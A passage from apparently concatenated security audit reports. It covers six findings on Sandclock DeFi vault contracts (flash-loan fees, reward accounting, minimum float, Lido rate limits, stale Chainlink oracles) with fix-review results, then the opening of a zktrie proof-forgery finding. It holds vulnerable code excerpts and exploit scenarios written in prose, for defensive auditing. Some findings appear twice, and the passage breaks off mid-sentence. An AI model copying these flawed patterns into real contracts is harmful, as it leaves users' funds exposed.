to leave a minimum float in the vault after the withdrawal. They would only be able to withdraw their assets minus the minimum float at most. The code for the _withdrawToVault function is shown in figure 4.1. The line highlighted in the figure would cause the revert in this situation, as there would not be enough invested to supply the requested amount. function _withdrawToVault ( uint256 _amount ) internal { uint256 n = protocolAdapters.length(); uint256 flashLoanAmount ; uint256 totalInvested_ = _totalCollateralInWeth() - totalDebt(); bytes [] memory callData = new bytes [](n + 1 ); uint256 flashLoanAmount_ ; uint256 amount_ ; uint256 adapterId ; address adapter ; for ( uint256 i ; i < n; i++) { (adapterId, adapter) = protocolAdapters.at(i); (flashLoanAmount_, amount_) = _calcFlashLoanAmountWithdrawing(adapter, _amount, totalInvested_); flashLoanAmount += flashLoanAmount_; callData[i] = abi.encodeWithSelector( this .repayAndWithdraw.selector, adapterId, flashLoanAmount_, priceConverter.ethToWstEth(flashLoanAmount_ + amount_) ); } // needed otherwise counted as loss during harvest totalInvested -= _amount; callData[n] = abi.encodeWithSelector(scWETHv2.swapWstEthToWeth.selector, type( uint256 ).max, slippageTolerance); uint256 float = asset.balanceOf( address ( this )); _flashLoan(flashLoanAmount, callData); emit WithdrawnToVault(asset.balanceOf( address ( this )) - float); } Figure 4.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L342–L376 Additionally, when this revert occurs, an integer overflow is given as the reason, which obscures the real reason and can make the user’s experience more confusing. Exploit Scenario Bob is the only remaining user in a scWETHv2 vault, and he has 2 ether invested. He wants to withdraw his assets, but all of his calls to the withdrawal function keep reverting due to an integer overflow. He keeps trying, wasting gas in the process, until he discovers that the maximum amount he is allowed to withdraw is around 1 ether. The rest of his funds are locked in the vault until the keeper makes a manual call to withdrawToVault or until the admin lowers the minimum float value. Recommendations Short term, fix the calculation of the amount to be withdrawn and make sure that it never exceeds the total invested amount. Long term, add end-to-end unit or fuzz tests that are representative of the way multiple users can interact with the protocol. Test for edge cases involving various numbers of users, investment amounts, and critical interactions, and make sure that the protocol’s invariants hold and that users do not lose access to funds in the event of such edge cases. +5. Lido stake rate limit could lead to unexpected reverts Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-5 Target: src/steth/Swapper.sol Description To mitigate the effects of a surge in demand for stETH on the deposit queue, Lido has implemented a rate limit for stake submissions. This rate limit is ignored by the lidoSwapWethToWstEth method of the Swapper library, potentially leading to unexpected reversions. The Lido stETH integration guide states the following: To avoid [reverts due to the rate limit being hit], you should check if getCurrentStakeLimit() >= amountToStake , and if it's not you can go with an alternative route. function lidoSwapWethToWstEth ( uint256 _wethAmount ) external { // weth to eth weth.withdraw(_wethAmount); // stake to lido / eth => stETH stEth.submit{value: _wethAmount}( address ( 0x00 )); // stETH to wstEth uint256 stEthBalance = stEth.balanceOf( address ( this )); ERC20( address (stEth)).safeApprove( address (wstETH), stEthBalance); wstETH.wrap(stEthBalance); } Figure 5.1: The submit method is subject to a rate limit that is not taken into account. ( sandclock-contracts/src/steth/Swapper.sol#L130–L142 ) Exploit Scenario A surge in demand for Ethereum validators leads many people using Lido to stake ETH, causing the Lido rate limit to be hit, and the submit method of the stEth contract begins to revert. As a result, the Sandclock keeper is unable to deposit despite the presence of alternate routes to obtain stETH, such as through Curve or Balancer. Recommendations Short term, have the lidoSwapWethToWstEth method of the Swapper library check whether the amount being deposited is less than the value returned by the getCurrentStakeLimit method of the stEth contract. If it is not, have the code use ZeroEx to swap or revert with a message that clearly communicates the reason for the failure. Long term, review the documentation for all third-party interactions and note any situations in which the integration could revert unexpectedly. If such reversions are acceptable, clearly document how they could occur and include a justification for this acceptance in the inline comments. +1. receiveFlashLoan does not account for fees Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-1 Target: src/steth/scWETHv2.sol , src/steth/scUSDCv2.sol Description The receiveFlashLoan functions of the scWETHv2 and scUSDCv2 vaults ignore the Balancer flash loan fees and repay exactly the amount that was loaned. This is not currently an issue because the Balancer vault does not charge any fees for flash loans. However, if Balancer implements fees for flash loans in the future, the Sandclock vaults would be prevented from withdrawing investments back into the vault. function flashLoan ( IFlashLoanRecipient recipient, IERC20[] memory tokens, uint256 [] memory amounts, bytes memory userData ) external override nonReentrant whenNotPaused { uint256 [] memory feeAmounts = new uint256 [](tokens.length); uint256 [] memory preLoanBalances = new uint256 [](tokens.length); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 amount = amounts[i]; preLoanBalances[i] = token.balanceOf( address ( this )); feeAmounts[i] = _calculateFlashLoanFeeAmount(amount); token.safeTransfer( address (recipient), amount); } recipient.receiveFlashLoan(tokens, amounts, feeAmounts , userData); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 preLoanBalance = preLoanBalances[i]; uint256 postLoanBalance = token.balanceOf( address ( this )); uint256 receivedFeeAmount = postLoanBalance - preLoanBalance; _require(receivedFeeAmount >= feeAmounts[i]); _payFeeAmount(token, receivedFeeAmount); } } Figure 1.1: Abbreviated code showing the receivedFeeAmount check in the Balancer flashLoan method in 0xBA12222222228d8Ba445958a75a0704d566BF2C8#code#F5#L78 In the Balancer flashLoan function , shown in figure 1.1, the contract calls the recipient’s receiveFlashLoan function with four arguments: the addresses of the tokens loaned, the amounts for each token, the fees to be paid for the loan for each token, and the calldata provided by the caller. The Sandclock vaults ignore the fee amount and repay only the principal, which would lead to reverts if the fees are ever changed to nonzero values. Although this problem is present in multiple vaults, the receiveFlashLoan implementation of the scWETHv2 contract is shown in figure 1.2 as an illustrative example: function receiveFlashLoan ( address [] memory , uint256 [] memory amounts, uint256 [] memory , bytes memory userData) external { _isFlashLoanInitiated(); // the amount flashloaned uint256 flashLoanAmount = amounts[ 0 ]; // decode user data bytes [] memory callData = abi.decode(userData, ( bytes [])); _multiCall(callData); // payback flashloan asset.safeTransfer( address (balancerVault), flashLoanAmount ); _enforceFloat(); } Figure 1.2: The feeAmounts parameter is ignored by the receiveFlashLoan method. ( sandclock-contracts/src/steth/scWETHv2.sol#L232–L249 ) Exploit Scenario After Sandclock’s scUSDv2 and scWETHv2 vaults are deployed and users start depositing assets, the Balancer governance system decides to start charging fees for flash loans. Users of the Sandclock protocol now discover that, apart from the float margin, most of their funds are locked because it is impossible to use the flash loan functions to withdraw vault assets from the underlying investment pools. Recommendations Short term, use the feeAmounts parameter in the calculation for repayment to account for future Balancer flash loan fees. This will prevent unexpected reverts in the flash loan handler function. Long term, document and justify all ignored arguments provided by external callers. This will facilitate a review of the system’s third-party interactions and help prevent similar issues from being introduced in the future. +2. Reward token distribution rate can diverge from reward token balance Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-2 Target: src/staking/RewardTracker.sol Description The privileged distributor role is responsible for transferring reward tokens to the RewardTracker contract and then passing the number of tokens sent as the _reward parameter to the notifyRewardAmount method. However, the _reward parameter provided to this method can be larger than the number of reward tokens transferred. Given the accounting for leftover rewards, such a situation would be difficult to recover from. /// @notice Lets a reward distributor start a new reward period. The reward tokens must have already /// been transferred to this contract before calling this function. If it is called /// when a reward period is still active, a new reward period will begin from the time /// of calling this function, using the leftover rewards from the old reward period plus /// the newly sent rewards as the reward. /// @dev If the reward amount will cause an overflow when computing rewardPerToken, then /// this function will revert. /// @param _reward The amount of reward tokens to use in the new reward period. function notifyRewardAmount ( uint256 _reward ) external onlyDistributor { _notifyRewardAmount(_reward); } Figure 2.1: The comment on the notifyRewardAmount method hints at an unenforced assumption that the number of reward tokens transferred must be equal to the _reward parameter provided. ( sandclock-contracts/src/staking/RewardTracker.sol#L185–L195 ) If a _reward value smaller than the actual number of transferred tokens is provided, the situation can be fixed by calling notifyRewardAmount again with a _reward parameter that accounts for the difference between the RewardTracker contract’s actual token balance and the rewards already scheduled for distribution. This solution is possible because the _notifyRewardAmount helper function accounts for leftover rewards if it is called during an ongoing reward period. function _notifyRewardAmount ( uint256 _reward ) internal { ... uint64 rewardRate_ = rewardRate; uint64 periodFinish_ = periodFinish; uint64 duration_ = duration; ... if ( block.timestamp >= periodFinish_) { newRewardRate = _reward / duration_; } else { uint256 remaining = periodFinish_ - block.timestamp ; uint256 leftover = remaining * rewardRate_; newRewardRate = (_reward + leftover ) / duration_; } Figure 2.2: The accounting for leftover rewards in the _notifyRewardAmount helper method ( sandclock-contracts/src/staking/RewardTracker.sol#L226–L262 ) This accounting for leftover rewards, however, makes the situation difficult to recover from if a _reward parameter that is too large is provided to the notifyRewardAmount method. As shown by the arithmetic in figure 2.2, if the reward period has not finished, the code for creating the newRewardRate value can only add to the reward distribution, not subtract from it. The only way to bring a too-large reward distribution back in line with the RewardTracker contract’s reward token balance is to transfer additional reward tokens to the contract. Exploit Scenario The RewardTracker distributor transfers 10 reward tokens to the RewardTracker contract and then mistakenly calls the notifyRewardAmount method with a _reward parameter of 100. Some users call the claimRewards method early and receive inflated rewards until the contract’s balance is depleted, leaving later users unable to claim any rewards. To recover, the distributor either needs to provide another 90 reward tokens to the RewardTracker contract or accept the reputational loss of allowing this misconfigured reward period to finish before resetting the reward payouts correctly during the next period. Recommendations Short term, modify the _notifyRewardAmount helper function to reset the rewardRate so that it is in line with the current rewardToken balance and the time remaining in the reward period. This change could also allow the fetchRewards method to maintain its current behavior but with only a single rewardToken.balanceOf external call. Long term, review the internal accounting state variables and document the ways in which they are influenced by the actual flow of funds. Pay attention to any internal accounting values that can be influenced by external sources, including privileged accounts, and reexamine the system’s assumptions surrounding the flow of funds. +3. Miscalculation in beforeWithdraw can leave the vault with less than minimum float Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-3 Target: src/steth/scWETHv2.sol Description When a user wants to redeem or withdraw, the beforeWithdraw function is called with the number of assets to be withdrawn as the assets parameter. This function makes sure that if the value of the float parameter (that is, the available assets in the vault) is not enough to pay for the withdrawal, the strategy gets some assets back from the pools to be able to pay. function beforeWithdraw ( uint256 assets , uint256 ) internal override { uint256 float = asset.balanceOf( address ( this )); if (assets <= float) return ; uint256 minimumFloat = minimumFloatAmount; uint256 floatRequired = float < minimumFloat ? minimumFloat - float : 0 ; uint256 missing = assets + floatRequired - float; _withdrawToVault(missing); } Figure 3.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L386–L396 When the float value is enough, the function returns and the withdrawal is paid with the existing float. If the float value is not enough, the missing amount is recovered from the pools via the adapters. The issue lies in the calculation of the missing parameter: it does not guarantee that the float value remaining after the withdrawal is at least the value of the minimumFloatAmount parameter. The consequence is that the calculation always leaves a float equal to floatRequired in the vault. If this value is small enough, it can cause users to waste gas when withdrawing small amounts because they will need to pay for the gas-intensive _withdrawToVault action. This eclipses the usefulness of having the float in the vault. The correct calculation should be uint256 missing = assets + minimumFloat - float; . Using this correct calculation would make the calculation of the floatRequired parameter unnecessary as it would no longer be required or used in the rest of the code. Exploit Scenario The value for minimumFloatAmount is set to 1 ether in the scWETHv2 contract. For this scenario, suppose that the current float is exactly equal to minimumFloatAmount . Alice wants to withdraw 0.15 WETH from her invested amount. Because this amount is less than the current float, her withdrawal is paid from the vault assets, leaving the float equal to 0.85 WETH after the operation. Then, Bill wants to withdraw 0.9 WETH, but the vault has no available assets to pay for it. In this case, when beforeWithdraw is called, Bill has to pay gas for the call to _withdrawToVault , which is an expensive action because it includes gas-intensive operations such as loops and a flash loan. After Bill’s withdrawal, the float in the vault is 0.15 WETH. This is a relatively small amount compared with minimumFloatValue , and it will likely make the next withdrawing/redeeming user also have to pay for the call to _withdrawToVault . Recommendations Short term, replace the calculation of the missing amount to be withdrawn on line 393 of the scWETHv2 contract with assets + minimumFloat - float . This calculation will ensure that the minimum float restriction is enforced after withdrawals. It will take the required float into consideration, so the separate calculation of floatRequired on line 392 of scWETHv2 would no longer be required. Long term, add unit or fuzz tests to make sure that the vault has an amount of assets equal to or greater than the minimum expected amount at all times. +4. Last user in scWETHv2 vault will not be able to withdraw their funds Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SANDCLOCK-4 Target: src/steth/scWETHv2.sol Description When a user wants to withdraw, the withdrawal amount is checked against the current vault float (the uninvested assets readily available in the vault). If the withdrawal amount is less than the float, the amount is paid from the available balance; otherwise, the protocol has to disinvest from the strategies to get the required assets to pay for the withdrawal. The issue with this approach is that in order to maintain a float equal to the minimumFloatValue parameter in the vault, the value to be disinvested from the strategies is calculated in the beforeWithdraw function, and its correct value is equal to the sum of the amount to be withdrawn and the minimum float minus the current float. If there is only one user remaining in the vault and they want to withdraw, this enforcement will not allow them to do so, because there will not be enough invested in the strategies to leave a minimum float in the vault after the withdrawal. They would only be able to withdraw their assets minus the minimum float at most. The code for the _withdrawToVault function is shown in figure 4.1. The line highlighted in the figure would cause the revert in this situation, as there would not be enough invested to supply the requested amount. function _withdrawToVault ( uint256 _amount ) internal { uint256 n = protocolAdapters.length(); uint256 flashLoanAmount ; uint256 totalInvested_ = _totalCollateralInWeth() - totalDebt(); bytes [] memory callData = new bytes [](n + 1 ); uint256 flashLoanAmount_ ; uint256 amount_ ; uint256 adapterId ; address adapter ; for ( uint256 i ; i < n; i++) { (adapterId, adapter) = protocolAdapters.at(i); (flashLoanAmount_, amount_) = _calcFlashLoanAmountWithdrawing(adapter, _amount, totalInvested_); flashLoanAmount += flashLoanAmount_; callData[i] = abi.encodeWithSelector( this .repayAndWithdraw.selector, adapterId, flashLoanAmount_, priceConverter.ethToWstEth(flashLoanAmount_ + amount_) ); } // needed otherwise counted as loss during harvest totalInvested -= _amount; callData[n] = abi.encodeWithSelector(scWETHv2.swapWstEthToWeth.selector, type( uint256 ).max, slippageTolerance); uint256 float = asset.balanceOf( address ( this )); _flashLoan(flashLoanAmount, callData); emit WithdrawnToVault(asset.balanceOf( address ( this )) - float); } Figure 4.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L342–L376 Additionally, when this revert occurs, an integer overflow is given as the reason, which obscures the real reason and can make the user’s experience more confusing. Exploit Scenario Bob is the only remaining user in a scWETHv2 vault, and he has 2 ether invested. He wants to withdraw his assets, but all of his calls to the withdrawal function keep reverting due to an integer overflow. He keeps trying, wasting gas in the process, until he discovers that the maximum amount he is allowed to withdraw is around 1 ether. The rest of his funds are locked in the vault until the keeper makes a manual call to withdrawToVault or until the admin lowers the minimum float value. Recommendations Short term, fix the calculation of the amount to be withdrawn and make sure that it never exceeds the total invested amount. Long term, add end-to-end unit or fuzz tests that are representative of the way multiple users can interact with the protocol. Test for edge cases involving various numbers of users, investment amounts, and critical interactions, and make sure that the protocol’s invariants hold and that users do not lose access to funds in the event of such edge cases. +5. Lido stake rate limit could lead to unexpected reverts Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-5 Target: src/steth/Swapper.sol Description To mitigate the effects of a surge in demand for stETH on the deposit queue, Lido has implemented a rate limit for stake submissions. This rate limit is ignored by the lidoSwapWethToWstEth method of the Swapper library, potentially leading to unexpected reversions. The Lido stETH integration guide states the following: To avoid [reverts due to the rate limit being hit], you should check if getCurrentStakeLimit() >= amountToStake , and if it's not you can go with an alternative route. function lidoSwapWethToWstEth ( uint256 _wethAmount ) external { // weth to eth weth.withdraw(_wethAmount); // stake to lido / eth => stETH stEth.submit{value: _wethAmount}( address ( 0x00 )); // stETH to wstEth uint256 stEthBalance = stEth.balanceOf( address ( this )); ERC20( address (stEth)).safeApprove( address (wstETH), stEthBalance); wstETH.wrap(stEthBalance); } Figure 5.1: The submit method is subject to a rate limit that is not taken into account. ( sandclock-contracts/src/steth/Swapper.sol#L130–L142 ) Exploit Scenario A surge in demand for Ethereum validators leads many people using Lido to stake ETH, causing the Lido rate limit to be hit, and the submit method of the stEth contract begins to revert. As a result, the Sandclock keeper is unable to deposit despite the presence of alternate routes to obtain stETH, such as through Curve or Balancer. Recommendations Short term, have the lidoSwapWethToWstEth method of the Swapper library check whether the amount being deposited is less than the value returned by the getCurrentStakeLimit method of the stEth contract. If it is not, have the code use ZeroEx to swap or revert with a message that clearly communicates the reason for the failure. Long term, review the documentation for all third-party interactions and note any situations in which the integration could revert unexpectedly. If such reversions are acceptable, clearly document how they could occur and include a justification for this acceptance in the inline comments. +6. Chainlink oracles could return stale price data Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-6 Target: src/steth/PriceConverter.sol , src/liquity/scLiquity.sol Description The latestRoundData() function from Chainlink oracles returns five values: roundId , answer , startedAt , updatedAt , and answeredInRound . The PriceConverter contract reads only the answer value and discards the rest. This can cause outdated prices to be used for token conversions, such as the ETH-to-USDC conversion shown in figure 6.1. function ethToUsdc ( uint256 _ethAmount ) public view returns ( uint256 ) { ( , int256 usdcPriceInEth ,,, ) = usdcToEthPriceFeed.latestRoundData(); return _ethAmount.divWadDown( uint256 (usdcPriceInEth) * C.WETH_USDC_DECIMALS_DIFF); } Figure 6.1: All returned data other than the answer value is ignored during the call to a Chainlink feed’s latestRoundData method. ( sandclock-contracts/src/steth/PriceConverter.sol#L67–L71 ) According to the Chainlink documentation , if the latestRoundData() function is used, the updatedAt value should be checked to ensure that the returned value is recent enough for the application. Similarly, the LUSD/ETH price feed used by the scLiquity vault is an intermediate contract that calls the deprecated latestAnswer method on upstream Chainlink oracles. contract LSUDUsdToLUSDEth is IPriceFeed { IPriceFeed public constant LUSD_USD = IPriceFeed( 0x3D7aE7E594f2f2091Ad8798313450130d0Aba3a0 ); IPriceFeed public constant ETH_USD = IPriceFeed( 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419 ); function latestAnswer () external view override returns ( int256 ) { return (LUSD_USD.latestAnswer() * 1 ether) / ETH_USD.latestAnswer(); } } Figure 6.2: The custom latestAnswer method in 0x60c0b047133f696334a2b7f68af0b49d2F3D4F72#code#L19 The Chainlink API reference flags the latestAnswer method as “(Deprecated - Do not use this function.).” Note that the upstream IPriceFeed contracts called by the intermediate LSUDUsdToLUSDEth contract are upgradeable proxies. It is possible that the implementations will be updated to remove support for the deprecated latestAnswer method, breaking the scLiquity vault’s lusd2eth price feed. Because the oracle price feeds are used for calculating the slippage tolerance, a difference may exist between the oracle price and the DEX pool spot price, either due to price update delays or normal price fluctuations or because the feed has become stale. This could lead to two possible adverse scenarios: ● ● If the oracle price is significantly higher than the pool price, the slippage tolerance could be too loose, introducing the possibility of an MEV sandwich attack that can profit on the excess. If the oracle price is significantly lower than the pool price, the slippage tolerance could be too tight, and the transaction will always revert. Users will perceive this as a denial of service because they would not be able to interact with the protocol until the price difference is settled. Exploit Scenario Bob has assets invested in a scWETHv2 vault and wants to withdraw part of his assets. He interacts with the contracts, and every withdrawal transaction he submits reverts due to a large difference between the oracle and pool prices, leading to failed slippage checks. This results in a waste of gas and leaves Bob confused, as there is no clear indication of where the problem lies. Recommendations Short term, make sure that the oracles report up-to-date data, and replace the external LUSD/ETH oracle with one that supports verification of the latest update timestamp. In the case of stale oracle data, pause price-dependent Sandclock functionality until the oracle comes back online or the admin replaces it with a live oracle. Long term, review the documentation for Chainlink and other oracle integrations to ensure that all of the security requirements are met to avoid potential issues, and add tests that take these possible situations into account. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance Low-Level Manipulation The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, implementing them may enhance code readability and may prevent the introduction of vulnerabilities in the future. ● ● ● ● Disambiguate the system’s contract names. The EulerAdapter and AaveV3Adapter contract names refer to more than one distinct contract. Some frameworks and analysis tools will crash when a project contains two contracts with the same name. Additionally, this pattern increases the risk of miscommunication between developers, auditors, and/or users. Consider adding a prefix or suffix to such contract names or, if applicable, consolidating them into a single contract. Consider having helper functions load values directly from storage. Many methods load values from storage and then pass them to internal helper functions. Some of these methods, enumerated below, do not use the loaded values except to pass them to the helper functions. Consider replacing the following arguments with direct storage loads. ○ BonusTracker._earnedBonus ■ accountBalance => balanceOf[account] ■ accountBonus => bonus[account] ○ RewardTracker._earned ■ _accountBalance => balanceOf[account] + multiplierPointsOf[_account] ■ _accountRewards => rewards[account] ○ RewardTracker._calcRewardPerToken ■ _totalSupply => totalSupply + totalBonus Use helper functions consistently. An assignment to the lastTimeRewardApplicable_ variable on line 241 of the RewardTracker contract features a ternary expression identical to that of the lastTimeRewardApplicable method in the same contract. To reduce code duplication and improve readability, replace this lastTimeRewardApplicable_ assignment with a call to this helper method instead. Remove unnecessary variable assignments. The lastUpdateTime variable is updated on line 251 of the RewardTracker contract, but this new value is not used before the same variable is updated again on line 270. Removing the first assignment on line 251 will yield identical behavior and improve the code’s readability. ● Use constants consistently. The addresses defined on lines 23–28 of the scLiquity contract could be specified as constant to save gas during deployment. However, to improve the maintainability of the code, consider defining these variables in the src/lib/Constants.sol file to keep all third-party contract addresses in one place. The following are the Sandclock contracts that define third-party addresses in place; consider importing them from Constants instead: ○ scLiquity ○ AaveV2Adapter (both) ○ EulerAdapter (only in scUSDCv2-adapters ) ○ MorphoAaveV3Adapter ○ Swapper ● ● ● Note that some of these, such as the xrouter address defined by the scLiquity contract, are already present in the Constants library. Also note that some addresses in the Constants library are defined twice, such as the ZEROX_ROUTER and ZERO_EX_ROUTER addresses. Document the omission of LQTY in the scLiquity contract’s totalAssets method. The LQTY rewards earned by depositing into the Liquity Stability Pool are expected to be small, but the gas costs for factoring LQTY rewards into the scLiquity vault are significant. As a result, the Sandclock team has made the decision to omit LQTY rewards from the totalAssets value. This design decision should be clearly specified and justified in inline comments. Document the requirements for using the Swapper contract. The Swapper contract handles ether but does not implement a receive method because it is intended to be used via delegatecall from a contract that does implement the receive method. Add comments to the Swapper contract documenting these requirements so that future developers and auditors are aware of how it should be safely used. Use libraries in the scLiquity vault. The scLiquity vault uses error-prone low-level calls to the 0x router while harvesting proceeds for LUSD. The Swapper library implements similar swap logic with additional safety measures. Consider using the Swapper library to exchange assets instead of re-implementing this logic in place. For consistency, also consider moving the LUSD-to-ETH price-fetching logic into the PriceConverter library. D. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On July 27, 2023 , reviewed the fixes and mitigations implemented by the Lindy Labs team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the six issues described in this report, Lindy Labs has resolved four, has partially resolved one, and has not resolved the remaining issue. For additional information, refer to the Detailed Fix Review Results below. ID Title Severity Status 1 receiveFlashLoan does not account for fees High Resolved 2 3 4 5 Reward token distribution rate can diverge from reward token balance Low Resolved Miscalculation in beforeWithdraw can leave the vault with less than minimum float Informational Resolved Last user in scWETHv2 vault will not be able to withdraw their funds Low Resolved Lido stake rate limit could lead to unexpected reverts Informational Unresolved 6 Chainlink oracles could return stale price data Informational Partially Resolved Detailed Fix Review Results TOB-SANDCLOCK-1: receiveFlashLoan does not account for fees Resolved. The feeAmounts parameter provided by Balancer flash loans is no longer ignored by the receiveFlashLoan method. The fees are now incorporated into the asset management strategy; other updates include a modified borrow amount from Aave and a modified swap amount from Uniswap. New unit tests have been added to ensure that the newly added logic properly accounts for nonzero fees that might be introduced by Balancer in the future. TOB-SANDCLOCK-2: Reward token distribution rate can diverge from reward token balance Resolved. The current token balance is now used by the _startRewardsDistribution method (renamed from _notifyRewardAmount ) of the RewardTracker contract. An additional state variable tracks the previously measured token balance to properly account for any balance increases. The distributor role no longer provides a parameter specifying how many reward tokens to allocate, eliminating any possibility of divergence. TOB-SANDCLOCK-3: Miscalculation in beforeWithdraw can leave the vault with less than minimum float Resolved. The arithmetic calculating how much float is missing has been fixed. A new unit test has been added that reproduces the provided exploit scenario to ensure that this change fixes the underlying issue and to prevent regression. TOB-SANDCLOCK-4: Last user in scWETHv2 vault will not be able to withdraw their funds Resolved. The _withdrawToVault method was refactored to limit the amount that the vault withdraws from investment strategies. This allows the last user to withdraw their remaining balance from the vault despite normal float requirements. A new assertion was added to the unit tests to ensure that the last user is able to withdraw their funds. TOB-SANDCLOCK-5: Lido stake rate limit could lead to unexpected reverts Unresolved. The client provided the following context for this finding’s fix status: We acknowledge the issue with a potential lido stake rate limit but we feel it will have a limited effect and not lead to reverts on user deposits since user funds first end up in the vault. Additional comments have been added specifying that the ZeroEx exchange will be the default method for swapping WETH for wstETH and that Lido will be used as a fallback, decreasing the likelihood of hitting the rate limit. For the benefit of future auditors, we recommend adding an inline comment to the lidoSwapWethToWstEth method in the Swapper library to explain the acceptance of the risk and the use of Lido only as a fallback. TOB-SANDCLOCK-6: Chainlink oracles could return stale price data Partially resolved. The third-party LSUDUsdToLUSDEth oracle has been deprecated in favor of the more reliable USD-to-ETH oracle maintained by Liquity. This solution has the side effect of assuming that the value of LUSD is exactly equal to that of USD. However, the amount of ETH held by the scLiquity vault at any given time is small relative to its exposure to the LUSD price, so the Lindy Labs team is willing to accept this trade-off. We recommend correcting an inline code comment that erroneously refers to the reported price as being in terms of LUSD rather than USD. For the benefit of future auditors and developers, we also recommend adding inline comments explaining the implications of and justifications for this trade-off. The usdcToEthPriceFeed and stEThToEthPriceFeed oracles have not been updated and are still at risk of using stale data without raising any warning. diff --git a/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt b/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt new file mode 100644 index 0000000..a02f51b --- /dev/null +++ b/findings_newupdate/tob/2023-07-scroll-zktrie-securityreview.txt @@ -0,0 +1,35 @@ +1. Lack of domain separation allows proof forgery Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-1 Target: trie/zk_trie_node.go Description Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function , define the hash of a leaf to be and the hash of a branch to be return the same result (perhaps because ’s return values all start with the byte 0 and ’s all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path. , where and are encoding functions that can never 𝐻 𝐻(𝑔(𝑏𝑟𝑎𝑛𝑐ℎ_𝑑𝑎𝑡𝑎)) 𝐻(𝑓(𝑙𝑒𝑎𝑓_𝑑𝑎𝑡𝑎)) 𝑔 𝑔 𝑓 𝑓 In zktrie, the hash for a node is defined by the NodeHash method, shown in figure 1.1. As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL,n.ChildR), while the hash of a leaf node is HashElems(1,n.NodeKey,n.valueHash). // LeafHash computes the key of a leaf node given the hIndex and hValue of the // entry of the leaf. func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) { return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt()) } // NodeHash computes the hash digest of the node by hashing the content in a // specific way for each type of node. // Merkle tree for each node. func (n *Node) NodeHash() (*zkt.Hash, error) { This key is used as the hash of the if n.nodeHash == nil { // Cache the key to avoid repeated hash computations. // NOTE: We are not using the type to calculate the hash! switch n.Type { case NodeTypeParent: // H(ChildL || ChildR) var err error n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt()) if err != nil { return nil, err } case NodeTypeLeaf: n.ValuePreimage) var err error n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, if err != nil { return nil, err } n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash) if err != nil { return nil, err } case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil } Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118–156) The function HashElems used here performs recursive hashing in a binary-tree fashion. For the purpose of this finding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and 